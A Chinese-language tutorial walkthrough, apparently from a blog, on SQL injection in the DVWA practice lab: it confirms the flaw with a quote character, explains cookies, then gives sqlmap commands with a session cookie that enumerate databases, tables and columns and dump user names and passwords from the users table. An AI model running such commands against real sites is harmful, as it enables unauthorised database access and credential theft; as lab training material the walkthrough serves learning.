赞
踩
打开DVWA,在SQL注入中输入1,返回正常。
输入1’,报错,返回
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1
说明此处存在注入漏洞
审查元素,选择network,里面发现Cookie信息。
Q:cookie是什么?
定义
cookie是由服务器发送给客户端(浏览器)的小量信息。
作用
cookie是键值对形式存储的少量信息,那它有什么作用呢?
我们知道,平时上网时都是使用无状态的HTTP协议传输出数据,这意味着客户端与服务端在数据传送完成后就会中断连接。这时我们就需要一个一直保持会话连接的机制。在session出现前,cookie就完全充当了这种角色。也就是,cookie的小量信息能帮助我们跟踪会话。一般该信息记录用户身份。
Cookie可以保持登录信息到用户下次与服务器的会话,换句话说,下次访问同一网站时,用户会发现不必输入用户名和密码就已经登录了。
当使用sqlmap注入时带上cookie,将会获得更多信息。
sqlmap -u + URL + cookie
sqlmap -u “http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=q8tdqvlpdagbbldrvh7bgvvb00”
得到数据库类型版本(MySQL),服务器类型版本(Apache,PHP)
sqlmap -u “http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=q8tdqvlpdagbbldrvh7bgvvb00” -dbs
sqlmap -u “http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=q8tdqvlpdagbbldrvh7bgvvb00” --dbs -D dvwa --tables
sqlmap -u “http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=q8tdqvlpdagbbldrvh7bgvvb00” --dbs -D dvwa -T users --columns
sqlmap -u “http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#” --cookie=“security=low;PHPSESSID=q8tdqvlpdagbbldrvh7bgvvb00” --dbs -D dvwa -T users -C user,password,user_id --dump
-D dvwa数据库
-T users表
-C user,password,user_id 查看这三列的值
-dump 输出CSV文件并存放到某个路径中
完成
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。